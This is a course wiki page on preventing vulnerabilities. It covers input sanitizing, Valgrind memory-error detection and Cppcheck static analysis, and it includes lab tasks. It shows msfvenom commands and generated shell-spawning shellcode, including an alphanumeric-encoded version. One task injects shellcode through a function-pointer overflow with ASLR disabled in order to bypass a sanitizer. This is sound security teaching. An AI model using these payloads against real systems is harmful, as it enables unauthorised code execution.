====== 0x0D. Preventing Vulnerabilities ======

===== Slides =====

<note warning>
TODO
</note>

===== Tutorials  =====


==== Sanitizing Input ====

Invalid input may cause a program to crash. Input may also consists of content that is able to exploit vulnerabilities in programs; among the most famous forms of input that causes exploits is [[https://www.owasp.org/index.php/SQL_Injection|SQL injection]]. If the developer won't check for input then an SQL select query may show private information to the attacker. One needs to validate input and make sure it follows a valid format.

Input validation or sanitizing is the process of making sure the input consists of only valid characters or words. The process of input sanitizing is a preventive measure against would be attacks. If the input isn't sanitized it may be used to exploit vulnerabilities in an app.

Consider the case of a web application that receives HTTP queries. It may be that a form requires the user to input an alphanumeric character. The user, however, enters an binary shellcode string and then uses it to exploit a vulnerability in the web application and launch a shell or run a different command. A careful programmer would sanitize input and make sure the username is alphanumeric. Though it is possible to bypass this and use an [[http://www.blackhatlibrary.net/Shellcode/Alphanumeric|alphanumeric shellcode]].

=== Alphanumeric Shellcode ===

An alphanumeric shellcode is a shellcode that consists solely of alphanumeric characters that may bypass a sanitizing method on a given string. Alphanumeric shellcodes have larger size due to the fact that they are only able to use certain instructions, such as doing increments to get to a certain value in a register.

The Metasploit framework is among the simplest ways of obtaining shellcodes and alphanumeric shellcodes. Metasploit is already installed on your Kali machines. However, if manual installation is needed, one would use the instructions [[http://www.linuxx.eu/2014/01/install-metasploit-on-debian.html|here]] (on Debian-based systems) or [[https://wiki.archlinux.org/index.php/Metasploit_Framework|here]] (Arch). 

For example, in order to get an alphanumeric shellcode we would use [[https://www.offensive-security.com/metasploit-unleashed/msfvenom/|msfvenom]] Metasploit command.

The use of the ''-h'' option provides a list of options for the command:<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: ./msfvenom [options] <var=val>

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message
</code>

In order to list available payloads one would use the command<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -l payloads | head

Framework Payloads (428 total)
==============================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
</code>

The complete command for creating an alphanumeric shellcode that spawns a shell:<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -f python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 43 bytes
buf =  ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08"
buf += "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53"
buf += "\x89\xe1\xcd\x80"

student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 148 (iteration=0)
x86/alpha_mixed chosen with final size 148
Payload size: 148 bytes
buf =  ""
buf += "\x89\xe5\xdb\xce\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x62\x4a\x44\x4b\x62"
buf += "\x78\x4d\x49\x51\x42\x65\x36\x43\x58\x56\x4d\x73\x53"
buf += "\x4d\x59\x39\x77\x42\x48\x64\x6f\x61\x63\x31\x78\x37"
buf += "\x70\x61\x78\x46\x4f\x31\x72\x51\x79\x30\x6e\x4b\x39"
buf += "\x6d\x33\x66\x32\x68\x68\x45\x58\x47\x70\x33\x30\x47"
buf += "\x70\x66\x4f\x52\x42\x30\x69\x62\x4e\x36\x4f\x50\x73"
buf += "\x72\x48\x77\x70\x33\x67\x51\x43\x4f\x79\x6d\x31\x48"
buf += "\x4d\x6f\x70\x41\x41"
</code>

As also stated [[http://www.offensive-security.com/metasploit-unleashed/Alphanumeric_Shellcode|here]], if one were to discover the analyze the shellcode, it would show the first characters aren't alphanumeric:<code>
buf += "\x4d\x6f\x70\x41\x41"
student@sss-vm:/opt/metasploit-framework.git$ python -c 'buf =  ""
> buf += "\x89\xe5\xdb\xce\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
> buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
> buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
> buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
> buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x62\x4a\x44\x4b\x62"
> buf += "\x78\x4d\x49\x51\x42\x65\x36\x43\x58\x56\x4d\x73\x53"
> buf += "\x4d\x59\x39\x77\x42\x48\x64\x6f\x61\x63\x31\x78\x37"
> buf += "\x70\x61\x78\x46\x4f\x31\x72\x51\x79\x30\x6e\x4b\x39"
> buf += "\x6d\x33\x66\x32\x68\x68\x45\x58\x47\x70\x33\x30\x47"
> buf += "\x70\x66\x4f\x52\x42\x30\x69\x62\x4e\x36\x4f\x50\x73"
> buf += "\x72\x48\x77\x70\x33\x67\x51\x43\x4f\x79\x6d\x31\x48"
> buf += "\x4d\x6f\x70\x41\x41"
> print buf'
�����u�_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIbJDKbxMIQBe6CXVMsSMY9wBHdoac1x7paxFO1rQy0nK9m3f2hhEXGp30GpfORB0ibN6OPsrHwp3gQCOym1HMopAA
</code>

This is because these instructions need a way of computing the current position of the shellcode. This may be solved by making a register (such as ECX for example) point to the beginning of the shellcode buffer. If that is possible in the program, then the shellcode may be instructed to fetch its address from that point:<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python BufferRegister=ECX
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 139 (iteration=0)
x86/alpha_mixed chosen with final size 139
Payload size: 139 bytes
buf =  ""
buf += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
buf += "\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
buf += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x61"
buf += "\x7a\x54\x4b\x56\x38\x7a\x39\x73\x62\x33\x56\x50\x68"
buf += "\x36\x4d\x43\x53\x6b\x39\x4a\x47\x45\x38\x54\x6f\x62"
buf += "\x53\x71\x78\x47\x70\x50\x68\x64\x6f\x73\x52\x72\x49"
buf += "\x32\x4e\x6e\x69\x6b\x53\x61\x42\x4b\x58\x54\x48\x57"
buf += "\x70\x73\x30\x43\x30\x76\x4f\x35\x32\x70\x69\x70\x6e"
buf += "\x44\x6f\x43\x43\x70\x68\x67\x70\x52\x77\x36\x33\x4c"
buf += "\x49\x6b\x51\x5a\x6d\x4f\x70\x41\x41"

student@sss-vm:/opt/metasploit-framework.git$ python -c 'buf =  ""
> buf += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
> buf += "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
> buf += "\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
> buf += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x61"
> buf += "\x7a\x54\x4b\x56\x38\x7a\x39\x73\x62\x33\x56\x50\x68"
> buf += "\x36\x4d\x43\x53\x6b\x39\x4a\x47\x45\x38\x54\x6f\x62"
> buf += "\x53\x71\x78\x47\x70\x50\x68\x64\x6f\x73\x52\x72\x49"
> buf += "\x32\x4e\x6e\x69\x6b\x53\x61\x42\x4b\x58\x54\x48\x57"
> buf += "\x70\x73\x30\x43\x30\x76\x4f\x35\x32\x70\x69\x70\x6e"
> buf += "\x44\x6f\x43\x43\x70\x68\x67\x70\x52\x77\x36\x33\x4c"
> buf += "\x49\x6b\x51\x5a\x6d\x4f\x70\x41\x41"
> print buf'
IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIazTKV8z9sb3VPh6MCSk9JGE8TobSqxGpPhdosRrI2NnikSaBKXTHWps0C0vO52pipnDoCCphgpRw63LIkQZmOpAA
</code>
==== Detecting memory errors with Valgrind ====

Valgrind is a multipurpose code profiling and memory debugging tool for Linux. It allows you to run your program in Valgrind's own environment that monitors memory usage such as calls to malloc and free (or new and delete in C++). If you use uninitialized memory, write off the end of an array, or forget to free a pointer, Valgrind can detect it.

=== Running Valgrind memcheck ===

<code bash>
valgrind --tool=memcheck program_name
...
=18515== malloc/free: in use at exit: 0 bytes in 0 blocks.
==18515== malloc/free: 1 allocs, 1 frees, 10 bytes allocated.
==18515== For a detailed leak analysis,  rerun with: --leak-check=yes
</code>

=== Interpreting errors  ===

Memcheck issues a range of error messages. This section presents a quick summary of what error messages mean. The precise behaviour of the error-checking machinery is described [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|here]]
== Illegal read / Illegal write errors ==

Take the following error:

<code bash>
Invalid read of size 4
   at 0x40F6BBCC: (within /usr/lib/libpng.so.2.1.0.9)
   by 0x40F6B804: (within /usr/lib/libpng.so.2.1.0.9)
   by 0x40B07FF4: read_png_image(QImageIO *) (kernel/qpngio.cpp:326)
   by 0x40AC751B: QImageIO::read() (kernel/qimage.cpp:3621)
Address 0xBFFFF0E0 is not stack'd, malloc'd or free'd
</code>

This happens when your program reads or writes memory at a place which Memcheck reckons it shouldn't. In this example, the program did a 4-byte read at address 0xBFFFF0E0, somewhere within the system-supplied library libpng.so.2.1.0.9, which was called from somewhere else in the same library, called from line 326 of qpngio.cpp, and so on.

Memcheck tries to establish what the illegal address might relate to, since that's often useful. So, if it points into a block of memory which has already been freed, you'll be informed of this, and also where the block was freed. Likewise, if it should turn out to be just off the end of a heap block, a common result of off-by-one-errors in array subscripting, you'll be informed of this fact, and also where the block was allocated. If you use the **--read-var-info** option Memcheck will run more slowly but may give a more detailed description of any illegal address.

Note that Memcheck only tells you that your program is about to access memory at an illegal address. It can't stop the access from happening. So, if your program makes an access which normally would result in a segmentation fault, you program will still suffer the same fate -- but you will get a message from Memcheck immediately prior to this. In this particular example, reading junk on the stack is non-fatal, and the program stays alive.

== Use of uninitialised values ==

<code bash>
Conditional jump or move depends on uninitialised value(s)
   at 0x402DFA94: _IO_vfprintf (_itoa.h:49)
   by 0x402E8476: _IO_printf (printf.c:36)
   by 0x8048472: main (tests/manuel1.c:8)
</code>

An uninitialised-value use error is reported when your program uses a value which hasn't been initialised -- in other words, is undefined. Here, the undefined value is used somewhere inside the printf machinery of the C library. This error was reported when running the following small program:

<code C>
int main()
{
  int x;
  printf ("x = %d\n", x);
}
</code>

It is important to understand that your program can copy around junk (uninitialised) data as much as it likes. Memcheck observes this and keeps track of the data, but does not complain. A complaint is issued only when your program attempts to make use of uninitialised data in a way that might affect your program's externally-visible behaviour. In this example, x is uninitialised. Memcheck observes the value being passed to _IO_printf and thence to _IO_vfprintf, but makes no comment. However, _IO_vfprintf has to examine the value of x so it can turn it into the corresponding ASCII string, and it is at this point that Memcheck complains.

Sources of uninitialised data tend to be:
 * Local variables in procedures which have not been initialised, as in the example above.
 * The contents of heap blocks (allocated with malloc, new, or a similar function) before you (or a constructor) write something there.

== Use of uninitialised or unaddressable values in system calls ==

Memcheck checks all parameters to system calls:
 * It checks all the direct parameters themselves, whether they are initialised.
 * If a system call needs to read from a buffer provided by your program, Memcheck checks that the entire buffer is addressable and its contents are initialised.
 *  If the system call needs to write to a user-supplied buffer, Memcheck checks that the buffer is addressable.

After the system call, Memcheck updates its tracked information to precisely reflect any changes in memory state caused by the system call.

Here's an example of two system calls with invalid parameters:
<code C>
#include <stdlib.h>
#include <unistd.h>
int main( void )
{
    char* arr  = malloc(10);
    int*  arr2 = malloc(sizeof(int));
    write( 1 /* stdout */, arr, 10 );
    exit(arr2[0]);
}
</code>

<code bash>
 Syscall param write(buf) points to uninitialised byte(s)
     at 0x25A48723: __write_nocancel (in /lib/tls/libc-2.3.3.so)
     by 0x259AFAD3: __libc_start_main (in /lib/tls/libc-2.3.3.so)
     by 0x8048348: (within /auto/homes/njn25/grind/head4/a.out)
   Address 0x25AB8028 is 0 bytes inside a block of size 10 alloc'd
     at 0x259852B0: malloc (vg_replace_malloc.c:130)
     by 0x80483F1: main (a.c:5)

  Syscall param exit(error_code) contains uninitialised byte(s)
     at 0x25A21B44: __GI__exit (in /lib/tls/libc-2.3.3.so)
     by 0x8048426: main (a.c:8)
</code>

The program has (a) written uninitialised junk from the heap block to the standard output, and (b) passed an uninitialised value to exit. Note that the first error refers to the memory pointed to by buf (not buf itself), but the second error refers directly to exit's argument arr2[0].

==  Illegal frees ==

<code bash>
Invalid free()
   at 0x4004FFDF: free (vg_clientmalloc.c:577)
   by 0x80484C7: main (tests/doublefree.c:10)
 Address 0x3807F7B4 is 0 bytes inside a block of size 177 free'd
   at 0x4004FFDF: free (vg_clientmalloc.c:577)
   by 0x80484C7: main (tests/doublefree.c:10)
</code>

Memcheck keeps track of the blocks allocated by your program with malloc/new, so it can know exactly whether or not the argument to free/delete is legitimate or not. Here, this test program has freed the same block twice. As with the illegal read/write errors, Memcheck attempts to make sense of the address freed. If, as here, the address is one which has previously been freed, you wil be told that -- making duplicate frees of the same block easy to spot. You will also get this message if you try to free a pointer that doesn't point to the start of a heap block.

== When a heap block is freed with an inappropriate deallocation function ==
In the following example, a block allocated with new[] has wrongly been deallocated with free:

<code bash>
Mismatched free() / delete / delete []
   at 0x40043249: free (vg_clientfuncs.c:171)
   by 0x4102BB4E: QGArray::~QGArray(void) (tools/qgarray.cpp:149)
   by 0x4C261C41: PptDoc::~PptDoc(void) (include/qmemarray.h:60)
   by 0x4C261F0E: PptXml::~PptXml(void) (pptxml.cc:44)
 Address 0x4BB292A8 is 0 bytes inside a block of size 64 alloc'd
   at 0x4004318C: operator new[](unsigned int) (vg_clientfuncs.c:152)
   by 0x4C21BC15: KLaola::readSBStream(int) const (klaola.cc:314)
   by 0x4C21C155: KLaola::stream(KLaola::OLENode const *) (klaola.cc:416)
   by 0x4C21788F: OLEFilter::convert(QCString const &) (olefilter.cc:272)
</code>

In C++ it's important to deallocate memory in a way compatible with how it was allocated. The deal is:

 * If allocated with malloc, calloc, realloc, valloc or memalign, you must deallocate with free.

 * If allocated with new, you must deallocate with delete.

 * If allocated with new[], you must deallocate with delete[].

The reason behind the requirement is as follows. In some C++ implementations, delete[] must be used for objects allocated by new[] because the compiler stores the size of the array and the pointer-to-member to the destructor of the array's content just before the pointer actually returned. delete doesn't account for this and will get confused, possibly corrupting the heap.

== Overlapping source and destination blocks ==
The following C library functions copy some data from one memory block to another (or something similar): memcpy, strcpy, strncpy, strcat, strncat. The blocks pointed to by their src and dst pointers aren't allowed to overlap. The POSIX standards have wording along the lines "If copying takes place between objects that overlap, the behavior is undefined." Therefore, Memcheck checks for this.

<code bash>
==27492== Source and destination overlap in memcpy(0xbffff294, 0xbffff280, 21)
==27492==    at 0x40026CDC: memcpy (mc_replace_strmem.c:71)
==27492==    by 0x804865A: main (overlap.c:40)
</code>

You don't want the two blocks to overlap because one of them could get partially overwritten by the copying.

== Memory leak detection ==

Memcheck keeps track of all heap blocks issued in response to calls to malloc/new et al. So when the program exits, it knows which blocks have not been freed.

If ''%%--leak-check%%'' is set appropriately, for each remaining block, Memcheck determines if the block is reachable from pointers within the root-set. The root-set consists of (a) general purpose registers of all threads, and (b) initialised, aligned, pointer-sized data words in accessible client memory, including stacks.

There are two ways a block can be reached. The first is with a "start-pointer", i.e. a pointer to the start of the block. The second is with an "interior-pointer", i.e. a pointer to the middle of the block. There are several ways we know of that an interior-pointer can occur:
 * The pointer might have originally been a start-pointer and have been moved along deliberately (or not deliberately) by the program. In particular, this can happen if your program uses tagged pointers, i.e. if it uses the bottom one, two or three bits of a pointer, which are normally always zero due to alignment, in order to store extra information.
 * It might be a random junk value in memory, entirely unrelated, just a coincidence.
 * It might be a pointer to an array of C++ objects (which possess destructors) allocated with new[]. In this case, some compilers store a "magic cookie" containing the array length at the start of the allocated block, and return a pointer to just past that magic cookie, i.e. an interior-pointer.
 * It might be a pointer to the inner char array of a C++ std::string. For example, some compilers add 3 words at the beginning of the std::string to store the length, the capacity and a reference count before the memory containing the array of characters. They return a pointer just after these 3 words, pointing at the char array.
 * It might be a pointer to an inner part of a C++ object using multiple inheritance.

You can optionally activate heuristics to use during the leak search to detect the interior pointers corresponding to the newarray, stdstring and multipleinheritance cases. If the heuristic detects that an interior pointer corresponds to such a case, the block will be considered as reachable by the interior pointer. In other words, the interior pointer will be treated as if it were a start pointer.

With that in mind, consider the nine possible cases described by the following figure.

<code>
Pointer chain            AAA Leak Case   BBB Leak Case
     -------------            -------------   -------------
(1)  RRR ------------> BBB                    DR
(2)  RRR ---> AAA ---> BBB    DR              IR
(3)  RRR               BBB                    DL
(4)  RRR      AAA ---> BBB    DL              IL
(5)  RRR ------?-----> BBB                    (y)DR, (n)DL
(6)  RRR ---> AAA -?-> BBB    DR              (y)IR, (n)DL
(7)  RRR -?-> AAA ---> BBB    (y)DR, (n)DL    (y)IR, (n)IL
(8)  RRR -?-> AAA -?-> BBB    (y)DR, (n)DL    (y,y)IR, (n,y)IL, (_,n)DL
(9)  RRR      AAA -?-> BBB    DL              (y)IL, (n)DL

Pointer chain legend:
- RRR: a root set node or DR block
- AAA, BBB: heap blocks
- --->: a start-pointer
- -?->: an interior-pointer

Leak Case legend:
- DR: Directly reachable
- IR: Indirectly reachable
- DL: Directly lost
- IL: Indirectly lost
- (y)XY: it's XY if the interior-pointer is a real pointer
- (n)XY: it's XY if the interior-pointer is not a real pointer
- (_)XY: it's XY in either case
</code>

Every possible case can be reduced to one of the above nine. Memcheck merges some of these cases in its output, resulting in the following four leak kinds.

 * **Still reachable**. This covers cases 1 and 2 (for the BBB blocks) above. A start-pointer or chain of start-pointers to the block is found. Since the block is still pointed at, the programmer could, at least in principle, have freed it before program exit. "Still reachable" blocks are very common and arguably not a problem. So, by default, Memcheck won't report such blocks individually.

 * **Definitely lost**. This covers case 3 (for the BBB blocks) above. This means that no pointer to the block can be found. The block is classified as "lost", because the programmer could not possibly have freed it at program exit, since no pointer to it exists. This is likely a symptom of having lost the pointer at some earlier point in the program. Such cases should be fixed by the programmer.

 * **Indirectly lost**. This covers cases 4 and 9 (for the BBB blocks) above. This means that the block is lost, not because there are no pointers to it, but rather because all the blocks that point to it are themselves lost. For example, if you have a binary tree and the root node is lost, all its children nodes will be indirectly lost. Because the problem will disappear if the definitely lost block that caused the indirect leak is fixed, Memcheck won't report such blocks individually by default.

 * **Possibly lost**. This covers cases 5--8 (for the BBB blocks) above. This means that a chain of one or more pointers to the block has been found, but at least one of the pointers is an interior-pointer. This could just be a random value in memory that happens to point into a block, and so you shouldn't consider this ok unless you know you have interior-pointers.

Furthermore, if suppressions exists for a block, it will be reported as "suppressed" no matter what which of the above four kinds it belongs to.

The following is an example leak summary.

<code>
LEAK SUMMARY:
   definitely lost: 48 bytes in 3 blocks.
   indirectly lost: 32 bytes in 2 blocks.
     possibly lost: 96 bytes in 6 blocks.
   still reachable: 64 bytes in 4 blocks.
        suppressed: 0 bytes in 0 blocks.
</code>

If heuristics have been used to consider some blocks as reachable, the leak summary details the heuristically reachable subset of 'still reachable:' per heuristic. In the below example, of the 79 bytes still reachable, 71 bytes (56+7+8) have been considered heuristically reachable.

<code>
LEAK SUMMARY:
   definitely lost: 4 bytes in 1 blocks
   indirectly lost: 0 bytes in 0 blocks
     possibly lost: 0 bytes in 0 blocks
   still reachable: 79 bytes in 5 blocks
                      of which reachable via heuristic:
                        stdstring          : 56 bytes in 2 blocks
                        newarray           : 7 bytes in 1 blocks
                        multipleinheritance: 8 bytes in 1 blocks
        suppressed: 0 bytes in 0 blocks
</code>

If ''%%--leak-check=full%%'' is specified, Memcheck will give details for each definitely lost or possibly lost block, including where it was allocated. (Actually, it merges results for all blocks that have the same leak kind and sufficiently similar stack traces into a single "loss record". The ''%%--leak-resolution%%'' CLI option lets you control the meaning of "sufficiently similar".) 
It cannot tell you when or how or why the pointer to a leaked block was lost; you have to work that out for yourself. In general, you should attempt to ensure your programs do not have any definitely lost or possibly lost blocks at exit.

Eg.

<code>
8 bytes in 1 blocks are definitely lost in loss record 1 of 14
   at 0x........: malloc (vg_replace_malloc.c:...)
   by 0x........: mk (leak-tree.c:11)
   by 0x........: main (leak-tree.c:39)

88 (8 direct, 80 indirect) bytes in 1 blocks are definitely lost in loss record 13 of 14
   at 0x........: malloc (vg_replace_malloc.c:...)
   by 0x........: mk (leak-tree.c:11)
   by 0x........: main (leak-tree.c:25)
</code>

The first message describes a simple case of a single 8 byte block that has been definitely lost. The second case mentions another 8 byte block that has been definitely lost; the difference is that a further 80 bytes in other blocks are indirectly lost because of this lost block. The loss records are not presented in any notable order, so the loss record numbers aren't particularly meaningful. The loss record numbers can be used in the Valgrind gdbserver to list the addresses of the leaked blocks and/or give more details about how a block is still reachable.

==== Static Analysis ====

Static analysis can be done using a variety of tools, ranging from ''lint''-like analyzers to software suites that attempt to do full semantic analysis on the code. Wikipedia gives a comprehensive [[https://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis|list of static code analysis tools]] for various programming languages. One such useful tool is [[http://cppcheck.sourceforge.net/|Cppcheck]], which has been used to discover a [[http://tech.slashdot.org/story/14/01/08/1421235/23-year-old-x11-server-security-vulnerability-discovered|23-year-old vulnerability]] in the X11 server.

Cppcheck is oriented towards C and C++. It can check basic errors related to the usage of C Standard Library and C++ STL functions, but it can also be extended to other external library functions through so-called library files. Some examples of basic Cppcheck usages are:

<code>
$ cppcheck --enable=all somefile.c # enable all checks
$ cppcheck --enable-all --library=mylib.cfg somefile.c # load an additional library file
</code>

Library files are XML files defined in the [[http://cppcheck.sourceforge.net/#documentation|Cppcheck manual]]. Their basic format is:

<code xml>
<?xml version="1.0"?>
<def>
	<function name="myfunc">
	<arg nr="1">
	<!-- constraints go here -->
		...
	</arg>
	</function>
</def>
</code>

<note>The ''cppcheck'' Kali Linux currently contains Cppcheck version 1.74; alternatively, you can download the latest Cppcheck sources from [[http://sourceforge.net/projects/cppcheck/files/cppcheck|Sourceforge]] and compile them by simply running ''make''.</note>

Another well know static analysis tool, used for detecting bugs and possible vulnerabilities is [[http://www.coverity.com/|Coverity]]. Open source projects may be checked using [[https://scan.coverity.com/|Coverity Scan]] for free; all one needs to do is create an account. Coverity Scan is integrated with GitHub.
===== Tasks =====

==== Valgrind warm-up exercise ====

Download the following {{:session:session13_task1.tgz|archive}}. Compile the C source file contained within with gcc and use Valgrind to detect the possible memory errors. After detecting the errors, try to find the incorrect lines of code causing them and fix the problems. 

==== Hunting memory errors in Nginx ====

Download the following {{:session:nginx-1.7.3-sss.tgz|archive}} containing a modified version of the Nginx web server. Compile the nginx web server and install it somewhere local<code>
./configure --prefix=/path/to/your/installation/folder
</code>
where ''/path/to/your/installation/folder/'' is a path of your choice for installing ''nginx''.

You can start the webserver by issuing the following command from the installation folder you've chosen:
<code bash>
./objs/nginx
</code>

If you can't find the executable in the installation folder you may issue the command below inside the installation folder<code>
find -name find
</code>

The server can be stopped by issuing:
<code bash>
./sbin/nginx -s stop
</code>

You may also like to attach valgrind to it and have it follow the child process it spawns. After starting it up, try a few HTTP requests to it to see what the problem might be. If you want to issue a lot of http requests, you may want to try the httperf tool. 

As done in the previous exercise, try to pinpoint the memory problem using Valgrind and then resolve it.
<note info>You may need to delve in a bit into the nginx code and understand how it's managing memory before attempting a fix </note>
==== Shellcode, Sanitizing and Alphanumeric Shellcode ====

Use {{:session:shellcode-validation.zip|this archive}} for this task. Use ''make'' to create the ''show-banner-message'' executable file. In this task, you should disable ASLR:<code>
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
</code>

First, use a suitable command line argument and value inside the ''banner.txt'' file to inject and run a binary shellcode. You may use [[http://shell-storm.org/shellcode/files/shellcode-250.php|this shellcode]] (you may ignore the ''setreuid'' part of the shellcode).

Second, assume the ''banner.c'' program is part of a library you don't have access to. Use input sanitizing of the ''message'' buffer in the ''show-banner-message.c'' program to prevent the running of a binary shellcode; i.e. make sure all characters are alphanumeric or ''NUL'', otherwise exit.

Third, use a alphanumeric shellcode in the ''message'' buffer to run the shellcode and bypass the preventive measure above. Watch the assembly code of the ''show-banner-message'' and use a suitable buffer register for ''msfvenom'' in order to obtain a completely alphanumeric shellcode. See what register stores the pointer to the ''message'' buffer before calling ''print_fn''.

<note tip>
The idea is to fill the ''banner'' buffer with ''36'' bytes such that the last ''4'' bytes would overwrite the ''print_fn'' global variable with an address we want to store the shellcode at. When ''print_fn'' gets called, our shellcode will be executed.

The shellcode will be passed as a byte array as an argument to the program. It will be stored in the ''message'' local variable. The address of the ''message'' local variable will be used as the address to overwrite the ''print_fn'' global function pointer, as stated above.
</note>
==== Static Analysis with Cppcheck ====

Use {{:session:checkme.zip|this archive}} for the task. Use ''make'' to create the ''checkme'' executable file.

Look through the source file. It consists of a function ''my_tokenize'', which is called from the main program multiple times. Run a basic ''cppcheck'' check on it.

Write a library configuration file that specifies that ''my_tokenize'''s first argument must be non-null and its second argument must have values between ''0'' and ''1024''. Use the [[http://cppcheck.sourceforge.net/manual.pdf|manual]] as a reference (''section 7: Library configuration'').

Run ''cppcheck'' again and tell it to load the newly created library file.


=== Extra: io.smashthestack.org ===

Go through the first 6 levels of the [[http://io.smashthestack.org/|io.smashthestack.org wargame]]. If you fill up to it, solve the ''_alt'' versions of the challenges as well.
===== References =====
 * [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|Details of Memcheck's checking machinery]]